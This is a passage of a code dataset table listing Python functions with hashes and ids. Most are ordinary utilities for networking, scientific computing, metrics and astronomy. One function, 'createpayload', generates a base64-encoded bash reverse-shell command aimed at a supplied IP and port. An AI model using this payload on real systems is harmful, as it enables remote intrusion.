content stringlengths 35 762k | sha1 stringlengths 40 40 | id int64 0 3.66M |
|---|---|---|
def bits_to_netmask(bits):
""" Convert bits to netmask
Args:
bits ('int'): bits to converts
ex.) bits = 32
Raise:
None
Returns:
Net mask
"""
mask = (0xffffffff >> (32 - bits)) << (32 - bits)
return (str( (0xff000000 & mask) >> 24) + '.' +
str( (0x00ff0000 & mask) >> 16) + '.' +
str( (0x0000ff00 & mask) >> 8) + '.' +
str( (0x000000ff & mask))) | 33897b357d99027d6f96fc5fb63f38989dbbe930 | 3,628,400 |
from typing import Optional
from typing import Tuple
from typing import Type
import random
def random_array_spec(
shape: Optional[Tuple[int, ...]] = None,
name: Optional[Text] = None,
dtype: Optional[Type[np.floating]] = None,
minimum: Optional[np.ndarray] = None,
maximum: Optional[np.ndarray] = None) -> specs.BoundedArray:
"""Create BoundedArray spec with unspecified parts randomized."""
shape = shape or random_shape()
name = name or random_string()
dtype = dtype or random.choice([np.float32, np.float64])
if minimum is None:
minimum = np.random.random(size=shape) * random.randint(0, 10)
minimum = minimum.astype(dtype)
if maximum is None:
maximum = np.random.random(size=shape) * random.randint(0, 10) + minimum
maximum = maximum.astype(dtype)
return specs.BoundedArray(shape, dtype, minimum, maximum, name) | 415b6f170b9912a7ed057cc740f761a7cb33bd0e | 3,628,401 |
def _clamp_angle(angle: Angle) -> Angle:
"""
Certain angles in the game should be prohibited because they are not funny
to play. The Function checks if angle is in the forbidden area and adjusts
the angle.
"""
delta_x = deg2rad(30.0)
delta_y = deg2rad(15.0)
new_angle = angle
if _is_bigger(angle.value, deg2rad(0.0), delta_x):
new_angle.value = deg2rad(0.0) + delta_x
elif _is_smaller(angle.value, deg2rad(90.0), delta_y):
new_angle.value = deg2rad(90.0) - delta_y
elif _is_bigger(angle.value, deg2rad(90.0), delta_y):
new_angle.value = deg2rad(90.0) + delta_y
elif _is_smaller(angle.value, deg2rad(180.0), delta_x):
new_angle.value = deg2rad(180.0) - delta_x
elif _is_bigger(angle.value, deg2rad(180.0), delta_x):
new_angle.value = deg2rad(180.0) + delta_x
elif _is_smaller(angle.value, deg2rad(270.0), delta_y):
new_angle.value = deg2rad(270.0) - delta_y
elif _is_bigger(angle.value, deg2rad(270.0), delta_y):
new_angle.value = deg2rad(270.0) + delta_y
elif _is_smaller(angle.value, deg2rad(360.0), delta_x):
new_angle.value = deg2rad(360.0) - delta_x
return new_angle | 43c82a06dbe932efa51b6169806c9ff0be131868 | 3,628,402 |
def delete(where, item_id):
"""Returns True if successful; otherwise, False"""
item_uri = uri % (where, str(item_id))
h = httplib2.Http()
response, content = h.request(item_uri, method="DELETE", headers=headers)
return response["status"] == "204", response, content | cd47b963f3675c982cbef57d250b63ac5559eab1 | 3,628,403 |
def calculate_pair_true_positive(docs, dataset_prefix, target_event_types=None):
"""We need this because in generating trigger candidates, we heuristically reject some candidates
So we cannot calculate the true positive from the candidates. We need to go back to the doc level annotations.
:type docs: list[nlplingo.text.text_theory.Document]
:type dataset_prefix: str
:type target_event_types: set[str] # This allows you to just test on some types, e.g. when you want to train on known types and test on novel types
"""
event_count = defaultdict(int)
for doc in docs:
for event in doc.events:
if target_event_types is None or event.label in target_event_types:
event_count[event.label] += 1
pair_true_positive = 0
for et in event_count:
print('In {} docs: num# {}={}'.format(dataset_prefix, et, event_count[et]))
count = event_count[et]
pair_true_positive += (count * (count - 1)) / 2
return pair_true_positive | 57acfacd341524575434e71bfb18530b7c65e2ed | 3,628,404 |
import time
def getXYforPlanet(time_et, planet, camera, observer=''):
"""
compute for all time instances in this class the xy position of a planet
within a camera_name field-of-view. If not visible, return (-1,-1).
If planet is visible, also return the size of the planet in pixels.
Routine is tested for planet_name=Earth
"""
#
camera_id = spiceypy.bodn2c(camera)
#
# In case we do not have an SPK for the camera
#
if not observer:
observer = camera
r_planet = (spiceypy.bodvrd(planet, 'RADII', 3))[1][0]
#
# get instrument related info
#
(shape, frame, bsight, vectors, bounds) = spiceypy.getfov(camera_id,
100)
mat = spiceypy.pxform(frame, 'J2000', time_et)
for bs in range(0, 4):
bounds[bs, :] = spiceypy.mxv(mat, bounds[bs, :])
[pos, ltime] = spiceypy.spkpos(planet, time_et, 'J2000',
'LT+S', observer)
visible = spiceypy.fovray(camera, pos, 'J2000', 'S', 'MPO',
time_et)
#
# only get detector position, if target is visible
#
x = 0.0
y = 0.0
s = 0.0
if visible:
hit = []
for p in range(0, 4):
#
# compute the plane that is build up by the coordinate origin and two FOV corner vectors
#
plane = spiceypy.psv2pl([0, 0, 0], bounds[p, :],
bounds[(p + 1) % 4, :])
#
# compute the projection of the target vector onto that plane
#
vout = (spiceypy.unorm(spiceypy.vprjp(pos, plane)))[0]
#
# calculate the angle between this vector and the original corner vectors
#
alpha = spiceypy.vsep(bounds[p, :], vout)
beta = spiceypy.vsep(bounds[(p + 1) % 4, :], vout)
#
# the ratio of these angles also give the ratio of the detector on the edge
# of the field of view, in a first approximation, average of the two opposite
# FOV corner values: these are the x,y coordinates on the detector
hit.append(1024 * alpha / (alpha + beta))
# get intersection of the points
(x, y) = findIntersection(hit[0], 0, hit[1], 1023, 0,
hit[1], 1023, hit[2])
size = 2 * r_planet * 500 / (
np.tan(35. * 2 * np.pi / 360.) * spiceypy.vnorm(pos))
else:
print('Planet {} not visible by {} at {}'.format(planet, camera, spiceypy.et2utc(time_et,'ISOC',1,25)))
return (False, False, False, False)
return (time, x, y, size) | 7677ebae00247ac227d6a89259b727e535c6e4f2 | 3,628,405 |
def change_format(df):
"""
This function changes the format of the data
"""
df['date'] = pd.to_datetime(df['date'])
to_be_numeric = ['open', 'high', 'low', 'close', 'volume']
df[to_be_numeric] = df[to_be_numeric].apply(pd.to_numeric)
return df | 0eab34c1bdef1fe955a20470228e08887e189e54 | 3,628,406 |
from functools import reduce
def _get_cell_nodes(G, cell_idx):
"""Get array of nodes for a cell."""
# To get face nodes in MRST:
# (The second column in cells_faces are cell indices)
# >> G.faces.nodes(G.faces.nodePos(cell_idx) : G.faces.nodePos(cell_idx+1)-1, 1)
cell_faces = G.cells.faces[G.cells.facePos[cell_idx,0]:G.cells.facePos[cell_idx+1,0],0]
# The iterator returns nodes for every cell face.
# The union of these nodes contain the unique nodes for the cell.
# = face1_nodes U face2_nodes U ...
return reduce(
np.union1d,
(G.faces.nodes[
G.faces.nodePos[face_idx,0]:G.faces.nodePos[face_idx+1,0]
] for face_idx in cell_faces)
) | d5cc87478bf38e1a3e489af593eea562dc60e0b8 | 3,628,407 |
import base64
def b64_receipt_to_full_service_receipt(b64_string: str) -> dict:
"""Convert a b64-encoded protobuf Receipt into a full-service receipt object"""
receipt_bytes = base64.b64decode(b64_string)
receipt = external_pb2.Receipt.FromString(receipt_bytes)
full_service_receipt = {
"object": "receiver_receipt",
"public_key": receipt.public_key.SerializeToString().hex(),
"confirmation": receipt.confirmation.SerializeToString().hex(),
"tombstone_block": str(int(receipt.tombstone_block)),
"amount": {
"object": "amount",
"commitment": receipt.amount.commitment.data.hex(),
"masked_value": str(int(receipt.amount.masked_value)),
},
}
return full_service_receipt | 7f456d579617c471d79b43a1d2079fad0c024e8a | 3,628,408 |
from pathlib import Path
def main(file: str = "", action: str = "") -> int:
"""This is now we figth!"""
if not file:
return usage()
# Resolve shell variables and ~
rom = Path(expandvars(file)).expanduser()
if action == "check":
return check(rom)
if action == "dump":
return dump(rom)
return 0 | 3671d36a9a12b11b294a33c48d585eceee7da3af | 3,628,409 |
def find_elements(node, xpath, allow_zero=True, allow_multiple=True):
"""Attempt to find child elements in a node by xpath. Raise exceptions if conditions are violated. Return a
(possibly empty) list of elements."""
all_elements = node.findall(xpath)
if (len(all_elements) == 0 and not allow_zero) or (len(all_elements) > 1 and not allow_multiple):
raise AssertionError(f'Found {len(all_elements)} instances of {xpath} in {node}, which is not allowed')
return all_elements | 2255fcd63f35837c647dd6dca81ab648d59addc8 | 3,628,410 |
from typing import Type
def name(class_name: str, chain_class: Type[ChainAPI]) -> Type[ChainAPI]:
"""
Assign the given name to the chain class.
"""
return chain_class.configure(__name__=class_name) | fc7069911c6698ecf3adb1418a08737fd7a8fa31 | 3,628,411 |
import json
def unlock(vault_path, key):
"""
Unlock legacy vault and retrieve content
"""
f = open(vault_path, "rb")
try:
nonce, tag, ciphertext = [f.read(x) for x in (16, 16, -1)]
finally:
f.close()
# Unlock Vault with key
cipher = AES.new(get_hash(key), AES.MODE_EAX, nonce)
data = cipher.decrypt_and_verify(ciphertext, tag)
# Set vault content to class level var
return json.loads(data.decode("utf-8")) | 059638ee12053db59bbd297dfc1ee2358a747f96 | 3,628,412 |
from datetime import datetime
def module_build_from_modulemd(yaml):
"""
Create a ModuleBuild object and return. It is not written into database.
Please commit by yourself if necessary.
"""
mmd = load_mmd(yaml)
build = ModuleBuild()
build.name = mmd.get_module_name()
build.stream = mmd.get_stream_name()
build.version = mmd.get_version()
build.state = BUILD_STATES["ready"]
build.modulemd = yaml
build.koji_tag = None
build.batch = 0
build.owner = "some_other_user"
build.time_submitted = datetime(2016, 9, 3, 12, 28, 33)
build.time_modified = datetime(2016, 9, 3, 12, 28, 40)
build.time_completed = None
build.rebuild_strategy = "changed-and-after"
return build | bc605653ca26d6da6466c796f828397c5d142d07 | 3,628,413 |
def largest_rectangle_area(heights):
""" return largest rectangle in histogram """
stack = [-1]
max_area = 0
for i in range(len(heights)):
# we are saving indexes in stack that is why we comparing last element in stack
# with current height to check if last element in stack not bigger then
# current element
while stack[-1] != -1 and heights[stack[-1]] >= heights[i]:
lastElementIndex = stack.pop()
max_area = max(max_area, heights[lastElementIndex] * (i - stack[-1] - 1))
stack.append(i)
# we went through all elements of heights array
# let's check if we have something left in stack
while stack[-1] != -1:
lastElementIndex = stack.pop()
max_area = max(max_area, heights[lastElementIndex] * (len(heights) - stack[-1] - 1))
return max_area | fefb750d57a250c322a6464be250fe2cb3a9a2df | 3,628,414 |
import subprocess
def kill_lines(path):
"""
Will run sed on all files in path and remove leftovers from commented out cookie cutter code ` # - ` or ` // - `
"""
re = '^\s*(#|//) -\s*$'
for escape in "()/|":
re = re.replace(escape, fr"\{escape}")
sed_command = f"/{re}/d"
print(f"removing kill lines | {sed_command} | @ { path }")
return subprocess.check_call(["find", path, "-type", "f", "-exec", "sed", "-i", sed_command, "{}", "+"]) | 19bd97900ff2be10528eed93a0a42f9984d404a6 | 3,628,415 |
def url_for(root, path, language=None):
"""If page at `path` exists, returns it's root-relative URL;
otherwise throws an exception.
"""
base_url = settings.BASE_URL
if language and language != settings.DEFAULT_LANGUAGE:
base_url += '%s/' % language
node = root.find_descendant(path)
if not node:
raise UnknownPathException(path)
slugs = node.get_slugs()
if path != settings.DEFAULT_PAGE:
cleaned_slugs = filter(bool, slugs)
if cleaned_slugs:
return base_url + '/'.join(cleaned_slugs) + '/'
return base_url | 2822c199a6195160b3319c7ef2979fb9dbef67ac | 3,628,416 |
import argparse
def get_args():
"""get command-line arguments"""
parser = argparse.ArgumentParser(
description='Argparse Python script',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
'-s',
'--state',
help='the state of the board (type str, default "........." [9 dots])',
metavar='str',
type=str,
default='.........')
parser.add_argument(
'-p',
'--player',
help='The player to modify the state (type str, valid "X" or "O", no default)',
metavar='str',
type=str,
default='')
parser.add_argument(
'-c',
'--cell',
help='the cell to alter (type int, valid 1-9, default None)',
metavar='int',
type=int,
default=None)
return parser.parse_args() | a610f27cd573b4a89b3fe8a6fb39563e004115b8 | 3,628,417 |
def build_upload_dict(metadata, tags, project):
"""Build the metadata/tags/projects in a dict compatible with what the OneCodex backend expects."""
upload_args = {}
if metadata:
# format metadata keys as snake case
new_metadata = {}
for md_key, md_val in metadata.items():
new_metadata[snake_case(md_key)] = md_val
upload_args["metadata"] = new_metadata
if tags:
upload_args["tags"] = tags
if project:
upload_args["project"] = getattr(project, "id", project)
return upload_args | 3ed5ffc2caa884c5dce89e54259ddd103832e006 | 3,628,418 |
from typing import Any
async def books_in_category(category: str) -> Any:
"""Retrieve the books of the given category from the database."""
result = [book for book in BOOKS if book.category == category]
return result | b78cdb386e9c2d73b60a4ccc94f9b56cf4b0b840 | 3,628,419 |
import json
def GetActivationIDsSince(since, limit=100):
"""
Returns the activation IDs (including the namespace)
"""
configs = GetDBConfigs()
url = configs['db_protocol']+'://'+configs['db_host']+':' + \
configs['db_port']+'/'+configs['db_prefix']+'activations/_find'
headers = {
'Content-Type': 'application/json',
}
body = {
"selector": {
"start": {
"$gte": since
}
},
"limit": limit
}
res = request('POST', url, body=json.dumps(body), headers=headers,
auth='%s:%s' % (configs['db_username'], configs['db_password']))
doc = json.loads(res.read())
IDs = [x['_id'] for x in doc["docs"]]
return IDs | 7c0912bd4e09795c5d3831c19f9337cedbedb8c2 | 3,628,420 |
def getOffset(viewID=DEFAULT_VIEW):
"""getOffset(string): -> (double, double)
Returns the x and y offset of the center of the current view.
"""
return _getUniversal(tc.VAR_VIEW_OFFSET, viewID) | bfcdc714bf708b839bc3207c10096f793274a4d6 | 3,628,421 |
import scipy
def laplacian_power(k: int):
"""Compute the coefficients of x^n, x^{n - 1}y, ..., y^n for the k-th power of the Laplacian."""
result = np.zeros(2*k + 1)
# The k-th power is given by (x^2 + y^2)^k = sum_{i = 0}^k {k choose i} x^{2i}y^{2(k - i)}.
# So the coefficient of x^{2i}y^{2(k - i)} is the binomial coefficient, and the coefficients
# at odd indices are zero
result[::2] = scipy.special.binom(k, np.arange(k + 1))
return result | 4826472a8f630d8a219f8a47b980b34875f5aefc | 3,628,422 |
from typing import Iterable
from typing import Any
def _as_valid_media_array(x: Iterable[Any]) -> np.ndarray:
"""Converts to ndarray (if not already), and checks validity of data type."""
a = np.asarray(x)
if a.dtype == bool:
a = a.astype(np.uint8) * np.iinfo(np.uint8).max
_as_valid_media_type(a.dtype)
return a | d1a3aea15dbcfc8c8c1fb15f9fe1a908f944e055 | 3,628,423 |
def docker_vm_is_running():
"""Using VBoxManage is 0.5 seconds or so faster than Machine."""
running_vms = check_output_demoted(['VBoxManage', 'list', 'runningvms'])
for line in running_vms.splitlines():
if '"{}"'.format(constants.VM_MACHINE_NAME) in line:
return True
return False | be9868cba3c44c53c56890b12812e1a30ae653a8 | 3,628,424 |
def fixture_frame_bucket() -> FrameBucket:
"""Return instance of frame version bucket."""
return FrameBucket() | 7a6b8d56bf4c81e2fef93d9da5a0a95ce883efb7 | 3,628,425 |
def _convert_asset_for_get_list_result(asset):
"""Converts an EarthEngineAsset to the format returned by getList."""
result = _convert_dict(
asset, {
'name': 'id',
'type': ('type', _convert_asset_type_for_get_list_result)
},
defaults={'type': 'Unknown'})
return result | 681e1a2324e928761b29312433c24ccaa635ecf7 | 3,628,426 |
def update_netbox_object(nb_obj, data, check_mode):
"""Update a Netbox object.
:returns tuple(serialized_nb_obj, diff): tuple of the serialized updated
Netbox object and the Ansible diff.
"""
serialized_nb_obj = nb_obj.serialize()
updated_obj = serialized_nb_obj.copy()
updated_obj.update(data)
if serialized_nb_obj == updated_obj:
return serialized_nb_obj, None
else:
data_before, data_after = {}, {}
for key in data:
if serialized_nb_obj[key] != updated_obj[key]:
data_before[key] = serialized_nb_obj[key]
data_after[key] = updated_obj[key]
if not check_mode:
nb_obj.update(data)
updated_obj = nb_obj.serialize()
diff = _build_diff(before=data_before, after=data_after)
return updated_obj, diff | 51e07fff4f7f34ee01325fffd74209889073ee16 | 3,628,427 |
def rle_1d(arr):
"""Return the length, starting position and value of consecutive identical values.
Parameters
----------
arr : sequence
Array of values to be parsed.
Returns
-------
(values, run lengths, start positions)
values : np.array
The values taken by arr over each run
run lengths : np.array
The length of each run
start position : np.array
The starting index of each run
Examples
--------
>>> a = [1, 1, 2, 2, 2, 2, 3, 3, 3, 3, 3, 3]
>>> rle_1d(a)
(array([1, 2, 3]), array([2, 4, 6]), array([0, 2, 6]))
"""
ia = np.asarray(arr)
n = len(ia)
if n == 0:
e = "run length array empty"
warn(e)
return None, None, None
y = np.array(ia[1:] != ia[:-1]) # pairwise unequal (string safe)
i = np.append(np.where(y), n - 1) # must include last element position
rl = np.diff(np.append(-1, i)) # run lengths
pos = np.cumsum(np.append(0, rl))[:-1] # positions
return ia[i], rl, pos | d9616406b84a58e1f9bb201107dd94eab9bc76d6 | 3,628,428 |
def get_time_until_next_departure(trip_call=None):
"""Gets the time until the departure from the next station in minutes
"""
if trip_call is None:
trip_call = get_trip()
return get_time_until_departure(evaNr=get_next_station_eva_number(trip_call=trip_call), trip_call=trip_call) | e1f7f7530d8fbd87ce2c7c8c88b122d3f98e73c2 | 3,628,429 |
def generateMessage(rotation, tiltRight, tiltLeft, eyeLeft, blinkLeft, blinkRight, eyeRight):
"""
"""
messageToSend = []
messageToSend.append(int(rotation))
messageToSend.append(int(tiltRight))
messageToSend.append(int(tiltLeft))
messageToSend.append(int(eyeLeft))
messageToSend.append(int(blinkLeft))
messageToSend.append(int(blinkRight))
messageToSend.append(int(eyeRight))
return messageToSend | fcda9d537cda1fd7dc6fbc1e888d2a1af598104c | 3,628,430 |
from re import M
def compute_performance_metrics(y_true, y_pred):
""" Compute precision, recall, and f1 score.
y_true: true label
y_pred: predicted label
Labels are not hot encoded
Return a dictionary containing Accuracy, Precision, Recall, F1 Score (samples, macro, weighted) and Hamming Loss
"""
# whether binary or multi-class classification
if len(np.unique(y_true)) == 2:
average_case = 'binary'
else:
average_case = 'macro'
scores = {
"Accuracy": M.accuracy_score(y_true, y_pred),
"Precision": M.precision_score(y_true, y_pred, average=average_case),
"Recall": M.recall_score(y_true, y_pred, average=average_case),
"F1_samples": M.f1_score(y_true, y_pred, average="samples"),
"F1_macro": M.f1_score(y_true, y_pred, average="macro"),
"F1_micro": M.f1_score(y_true, y_pred, average="micro"),
"F1_weighted": M.f1_score(y_true, y_pred, average="weighted"),
"F1_binary": M.f1_score(y_true, y_pred, average="binary"),
"Hamming Loss": M.hamming_loss(y_true, y_pred),
}
return scores | e4449e733d2b644e7f89a9258c876c0b6788ecac | 3,628,431 |
def metablock(parsed):
"""
Remove HTML tags, entities and superfluous characters from meta blocks.
"""
parsed = " ".join(parsed.replace("\n", "").split()).replace(" ,", ",")
return strip_tags(decode_entities(parsed)) | 8c5e639ee4b8ce083013a530b0a50b750d37dcf1 | 3,628,432 |
def unit_vector(vector):
""" Returns the unit vector of the vector. """
vec_norm = np.linalg.norm(vector)
if vec_norm == 0:
return vector * 0
else:
return vector / np.linalg.norm(vector) | 6cb334012a71f61d5c5b8014aa67cc730bbc6c68 | 3,628,433 |
def app_metadata_json():
"""Create metadata.json content for a test app."""
return {
"description": "A test app that does not really exist.",
"title": "Test App",
"version": "1.0.0",
"authors": "aiidalab",
"logo": "img/logo.png",
"state": "development"
} | a07c21259c43980e51e0a8e115e589b02e493d04 | 3,628,434 |
import os
def align_to_target(
infile=None,
outfile=None,
template=None,
interpolation='cubic',
asvelocity=True,
overwrite=False,
axes=[-1]
):
"""
Align one cube to another, creating a copy. Right now a thin
wrapper to imregrid used mostly to avoid exposing CASA directly
into the postprocessHandler. Might evolve in the future.
"""
if infile is None or template is None or outfile is None:
logger.error("Missing required input.")
return(False)
if os.path.isdir(infile) == False and os.path.isfile(infile) == False:
logger.error("Input file missing - "+infile)
return(False)
if os.path.isdir(template) == False and os.path.isfile(template) == False:
logger.error("Template file missing - "+template)
return(False)
if os.path.isfile(outfile) or os.path.isdir(outfile):
if overwrite:
os.system('rm -rf '+outfile)
else:
logger.error("Output exists and overwrite set to false - "+outfile)
return(False)
casaStuff.imregrid(
imagename=infile,
template=template,
output=outfile,
interpolation=interpolation,
asvelocity=asvelocity,
axes=axes,
overwrite=True)
return(True) | af02e01ace9ac3a8862b81699256723b265fff49 | 3,628,435 |
def get_text(original, token, replace):
"""Convenience function for getting the text to use for a match when
formatting.
If ``replace`` is False, returns the part of ``original`` between
``token.startchar`` and ``token.endchar``. If ``replace`` is True, returns
``token.text``.
"""
if replace:
return token.text
else:
return original[token.startchar:token.endchar] | b0e2e53611cb5b26b04d0e8350f1ae88a6b56056 | 3,628,436 |
def LoadUCursor(fc,flist=None):
"""Important note: Function creates two outputs, also only opens cursor,
no "with" function to automatically close,
remeber to delete cursor and fieldlist when finished"""
fields = [field.name for field in arcpy.ListFields(fc)]
if flist:
for f in flist:
fields.append(f)
cursor = arcpy.da.UpdateCursor(fc,fields)
flist = cursor.fields
return cursor, flist | c18542a711670ed0d28bc682cca8958bd2c9e360 | 3,628,437 |
import torch
def cal_region_id(data, fps_index, result_path, save=True):
""" calculate and save region id of all the points
Input:
data: (B,num_points,3) tensor, point cloud, num_points=1024
fps_index: (num_regions,) ndarray, center idx of the 32 regions
result_path: path to save file
Return:
region_id: (num_points,) ndarray, record each point belongs to which region
"""
data_fps = data[:, fps_index, :] # (B, num_regions, 3), centroids of each region
distance = square_distance(data, data_fps) # (B, num_points, num_regions), here B=1
region_id = torch.argmin(distance, dim=2) # (B, num_points), B=1
region_id = region_id.squeeze().cpu().numpy() # (num_points,) ndarray
if save:
np.save(result_path + "region_id.npy", region_id) # (num_points,)
return region_id | 7a845b0b47c45455d7bef5c428e4aa774934308e | 3,628,438 |
def is_perfect_piggy(turn_score):
"""Returns whether the Perfect Piggy dice-swapping rule should occur."""
# BEGIN PROBLEM 4
"*** REPLACE THIS LINE ***"
if turn_score==1:
return False
elif is_perfect_square(turn_score) or is_perfect_cube(turn_score):
return True
else:
return False
# END PROBLEM 4 | bca796f0eb90c8de0bc5d78780d702e3fd5cc153 | 3,628,439 |
from freqtrade.worker import Worker
from typing import Dict
from typing import Any
def start_trading(args: Dict[str, Any]) -> int:
"""
Main entry point for trading mode
"""
# Import here to avoid loading worker module when it's not used
# Create and run worker
worker = None
try:
worker = Worker(args)
worker.run()
except Exception as e:
logger.error(str(e))
logger.exception("Fatal exception!")
except KeyboardInterrupt:
logger.info('SIGINT received, aborting ...')
finally:
if worker:
logger.info("worker found ... calling exit")
worker.exit()
return 0 | 61776c7f3a9cee79fb53cceffe6a3dcd81db7449 | 3,628,440 |
def make_pairs(values):
"""
Makes a list pairs from an iterable. However, different iterables have
different behaviours when making a list of pairs.
If you are trying to make a list of pairs from a CoupledPair,
the CoupledPair object is wrapped in a list and returned back to you.
If you are trying to make a list of pairs from a list or set,
make_pairs loops through the array and forms CoupledPair objects
recursively.
If you are trying to make a list of pairs from a tuple,
the CoupledPair initializer is run and the new CoupledPair object is
returned in a list.
If you are trying to make a list of pairs from a dict,
the items in the dictionary are looped through and CoupledPair instances are
created. Using a dictionary to create a list of CoupledPair objects is by far
the safest method.
Parameters
----------
value: CoupledPair, list, set, tuple or dict
Returns
-------
list of CoupledPair
"""
if isinstance(values, CoupledPair):
return [values]
elif isinstance(values, list) or isinstance(values, set):
result = []
for value in values:
result.extend(make_pairs(value))
return result
elif isinstance(values, tuple):
return [CoupledPair(values[0], values[1])]
elif isinstance(values, dict):
result = []
for key, value in values.items():
result.append(CoupledPair(key, value))
return result
else:
raise TypeError(
"make_pairs only accepts CoupledPair, list, set, tuple or dict"
) | 80f4902852c84717f2fd213006cebaf3de69079e | 3,628,441 |
def directed_decision_free_path(cbn: CausalBayesianNetwork, start_node: str, end_node: str) -> bool:
"""
Checks to see if a directed decision free path exists
"""
for node in [start_node, end_node]:
if node not in cbn.nodes():
raise KeyError(f"The node {node} is not in the (MA)CID")
# ignore path's start_node and end_node
return any(cbn.decisions.isdisjoint(path[1:-1]) for path in find_all_dir_paths(cbn, start_node, end_node)) | 39a7ba85314ed4429e5b795101429758b02b807a | 3,628,442 |
def post_detail(request, year, month, day, post):
"""
Crear una vista para mostrar el detalle de solo un Post
"""
post = get_object_or_404(Post, slug=post,
status='published',
publish__year=year,
publish__month=month,
publish__day=day)
# Lista de comentarios activos para este post
comments = post.comments.filter(active=True)
new_comment = None
if request.method == 'POST':
# Un comentario fue publicado
comment_form = CommentForm(data=request.POST)
if comment_form.is_valid():
# Crear objeto Comment pero sin guardarlo en la bd todavia
new_comment = comment_form.save(commit=False)
# Asignar el post actual al comentario
new_comment.post = post
# Guardar el comentario en la bd
new_comment.save()
else:
comment_form = CommentForm()
# Lista de posts similares (importante)
post_tags_ids = post.tags.values_list('id', flat=True)
similar_posts = Post.published.filter(tags__in=post_tags_ids).exclude(id=post.id)
similar_posts = similar_posts.annotate(same_tags=Count('tags')).order_by('-same_tags', '-publish') [:4]
return render(request, 'blog/post/detail.html', {'post': post,
'comments':comments,
'new_comment':new_comment,
'comment_form': comment_form,
'similar_posts': similar_posts}) | 60a8930b673c4f99c43075cff5c2fe1665ccede0 | 3,628,443 |
import struct
def calc_genkey_pubkey_digest(mode, key_id, public_key, temp_key, sn, other_data=None):
"""
Replicate the internal TempKey calculations of the GenKey command in
digest mode.
"""
if len(public_key) != 64:
raise ValueError('public_key must be 64 bytes')
if len(temp_key) != 32:
raise ValueError('temp_key must be 32 bytes')
msg = b''
msg += temp_key
msg += b'\x40' # GenKey Opcode
if mode & 0x10:
# Slot is storing a public key directly, use OtherData for Mode and KeyID
if len(other_data) != 3:
raise ValueError('other_data must be 3 bytes')
msg += other_data
else:
# Slot is storing a private key and the public key is generated
msg += struct.pack("B", mode)
msg += struct.pack("<H", key_id)
msg += sn[8:9]
msg += sn[0:2]
msg += b'\x00'*25
msg += public_key
return sha256(msg).digest() | 3a0bff6e535b12e7d53d3ad90af019821d04c78a | 3,628,444 |
import os
def createpayload(ip, port):
"""Create base64 payload"""
# Rewrite our ip in HEX (https://github.com/D4Vinci/Cuteit)
hexip = Cit.lib(ip)
base64payload = os.popen("printf 'bash -i >& /dev/tcp/" + str(hexip.hex) + "/" + port + " 0>&1' | base64 | tr -d "
"'\n'").read()
return base64payload | 9a49cec5c34839bf3c0be5fa6b1d3f7346ee1ea9 | 3,628,445 |
def create_repeated_leaf_node(parent_index,
values):
"""Creates a repeated PrensorField.
Args:
parent_index: a list of integers that is converted to a 1-D int64 tensor.
values: a list of whatever type that the field represents.
Returns:
A PrensorField with the parent_index and values set appropriately.
"""
return prensor.LeafNodeTensor(
tf.constant(parent_index, dtype=tf.int64), tf.constant(values), True) | 147c6c4b60a65bbaa979a6e2f460101d24f58cb1 | 3,628,446 |
from datetime import datetime
import time
def api_rate_limit(func):
"""Decorator to limit how often a function can be called"""
def inner(self, *args, **kwargs):
if self._previous_request_timestamps[0] >= datetime.now() - timedelta(seconds=1):
print("API Rate Limiting... 10 Requests per second")
time.sleep(self.api_rate_limit_delay) # Rate limit to less than 10 API requests per second
self._previous_request_timestamps.append(datetime.now())
return func(self,*args, **kwargs)
return inner | d15f4fe65e6c8fbdfc87f924b4c77b3fee8fed56 | 3,628,447 |
def calc_Ti(Te, Tg, n):
"""Calcuate the infectious period."""
return (Tg - Te) * 2.0 * n / (n + 1.0) | 7ba0176b821032e4f69ff7fe368393c2773c7d0d | 3,628,448 |
def function_from_graph_def(graph_def, inputs, outputs, captures=None):
"""Creates a ConcreteFunction from a GraphDef.
Args:
graph_def: A GraphDef to make a function out of.
inputs: A Tensor name or nested structure of names in `graph_def` which
should be inputs to the function.
outputs: A Tensor name or nested structure of names in `graph_def` which
should be outputs of the function.
captures: (Optional) A dictionary mapping node names in `graph_def` that
should be captured as inputs to tensors containing the value of the
captured inputs.
Returns:
A ConcreteFunction.
"""
def _imports_graph_def():
importer.import_graph_def(graph_def, name="")
graph = ops.get_default_graph()
if captures is not None:
for c in captures:
graph.add_capture(captures[c], graph.get_tensor_by_name(str(c) + ":0"))
wrapped_import = wrap_function(_imports_graph_def, [])
import_graph = wrapped_import.graph
return wrapped_import.prune(
nest.map_structure(import_graph.as_graph_element, inputs),
nest.map_structure(import_graph.as_graph_element, outputs)) | 852810bcffb067b5d7aad47d58395afe7c3bc0ac | 3,628,449 |
def resource_not_found(error):
"""
Error handling for bad request
"""
return jsonify({
"success": False,
"error": 400,
"message": "bad request"
}), 400 | a0c85f191e38022b8d6801b098c54d8863dba9a7 | 3,628,450 |
def _get_indent(line):
"""Return the indentation in front of a line"""
indent = line.replace(line.lstrip(), '')
return indent | 6a5dd97d4c5702a55b8b1ddaad91c5ecb99458fa | 3,628,451 |
def predict_test(this_model, this_true_data, this_y_scaler, target_var, environment):
"""
Using selected best model for this horizon, generates prediction (which is then inversed transform)
Is called in a loop of features which exceed the minimum correlation coefficient
Parameters
----------
this_model : list
List containing name and fitted object of best model
this_true_data : dataframe
Test dataset, with selected columns only
this_y_scaler : scaler object
Scaler of target variable
target_var : string
Target variable
environment : string
If we are in "QAS", we will have actual values, and will therefore return descaled values of actuals
If we are in "PRD", returns None for actuals
Returns
-------
y_test_actual
Scaled actual value. None if we are in "PRD" ie this is production environment and truth is not known
y_test_actual_descaled
Descaled actual value. None if we are in "PRD" ie this is production environment and truth is not known
predictions
Scaled predicted value.
y_pred
Descaled predicted value.
this_model_name
Returns name of model used for prediction
"""
this_model_name = this_model[0]
this_regressor = this_model[1]
x_cols = [x for x in this_true_data.columns.tolist() if x != target_var]
X_test = this_true_data[x_cols]
if environment == "PRD":
y_test_actual = None
y_test_actual_descaled = None
elif environment == "QAS":
y_test_actual = this_true_data[target_var].values.reshape(-1,1)[0]
# descale target
descaled_test_actual_target = inverse_scale_target(this_y_scaler,y_test_actual.reshape(-1, 1),target_var)
descaled_test_actual_target = descaled_test_actual_target.values.reshape(-1,1)
y_test_actual_descaled = descaled_test_actual_target[0]
# get prediction
reg = this_regressor
predictions = reg.predict(X_test.values)
predictions = predictions.reshape(-1,1)[0]
descaled_test_predicted_target = inverse_scale_target(this_y_scaler,predictions.reshape(-1, 1),target_var)
descaled_test_predicted_target = descaled_test_predicted_target.values.reshape(-1,1)
y_pred = descaled_test_predicted_target[0]
